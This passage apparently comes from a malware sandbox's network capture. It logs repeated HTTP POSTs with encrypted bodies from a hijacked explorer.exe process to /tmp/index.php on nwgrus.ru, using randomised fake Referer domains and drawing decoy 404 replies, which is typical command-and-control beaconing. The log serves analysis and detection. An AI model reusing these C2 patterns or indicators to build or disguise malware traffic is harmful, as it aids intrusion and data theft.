to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50561	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:41.546612978 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hvawqwmqdyhhbuvh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: nwgrus.ru
Oct 11, 2024 06:37:41.546637058 CEST	292	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 25 43 c2 ee Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu%CO4t'RsCg9ZX{YLWaJ;Ezj5R5`LL_M[iODB=gn[P`NDZ)M6v
Oct 11, 2024 06:37:42.807575941 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50562	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:42.815881014 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pmvtliwpktklau.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: nwgrus.ru
Oct 11, 2024 06:37:42.815903902 CEST	301	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4e 43 b5 fc Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuNCZTpqhhX!2r-]<OMeM;bj//'qaN,~.\'GfhE-(@:GR$;
Oct 11, 2024 06:37:44.078490973 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50563	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:44.086987019 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://faxctnknnkusgdi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: nwgrus.ru
Oct 11, 2024 06:37:44.087074041 CEST	285	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7e 02 f8 aa Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu~G7f.Zk}>[I(PV#&DFO5.J^YHao&.Sb(":xxh<W,jFQ(p
Oct 11, 2024 06:37:45.348758936 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50564	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:45.361881971 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lsncadftghcgkll.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: nwgrus.ru
Oct 11, 2024 06:37:45.361901045 CEST	258	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5c 0a ea 86 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu\l;G]4B>="Qt$FCuI\RVS1%1{!0=J&Z_lf)XA1{*CmS`SP`vy)N;
Oct 11, 2024 06:37:46.644383907 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50565	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:46.651829004 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lpydjvblecmmk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 182 Host: nwgrus.ru
Oct 11, 2024 06:37:46.651843071 CEST	182	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 77 46 ac e9 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuwFZ[qs:k4Tpr.uMxvgLbl/&bi4=u}8:NFL
Oct 11, 2024 06:37:47.887083054 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:47 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50566	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:47.895406008 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iepqpqyryvhgtcv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 145 Host: nwgrus.ru
Oct 11, 2024 06:37:47.895428896 CEST	145	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4c 34 e4 a9 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuL4\Hj'WUPujbu\JE;-R"#
Oct 11, 2024 06:37:49.175060987 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50567	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:49.185616016 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oenjfnfpfgckga.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 161 Host: nwgrus.ru
Oct 11, 2024 06:37:49.185630083 CEST	161	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 38 49 e3 89 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu8Iq[MVDO`(lWnK2;T82AC8*!,
Oct 11, 2024 06:37:50.444509983 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50568	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:50.457628965 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nufhygmjiointcnq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: nwgrus.ru
Oct 11, 2024 06:37:50.457668066 CEST	225	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 78 04 d3 fb Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuxhxw*l;zjsc47R8V)WPWR}hIHz2!#nD3;sY%,[Y6
Oct 11, 2024 06:37:51.736558914 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50569	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:51.745544910 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hsidmskxdmqv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: nwgrus.ru
Oct 11, 2024 06:37:51.745570898 CEST	201	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 64 30 d5 85 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vud0X?Gxcs6Ds <H.DSa'6u{U=l7Y.jxmH0yAiI0U
Oct 11, 2024 06:37:53.006021023 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50570	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:53.014760971 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tnccrjrkqwl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: nwgrus.ru
Oct 11, 2024 06:37:53.014760971 CEST	118	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 59 1f ca 85 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuYTxx`93+2TA[
Oct 11, 2024 06:37:54.248764038 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50571	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:54.259085894 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ttovpyftqljtjbyu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: nwgrus.ru
Oct 11, 2024 06:37:54.259109974 CEST	181	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 59 3a db bb Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuY:_uvs{Pq"ubFuFe8/H?.HG>(9)s},x]D/
Oct 11, 2024 06:37:55.768132925 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 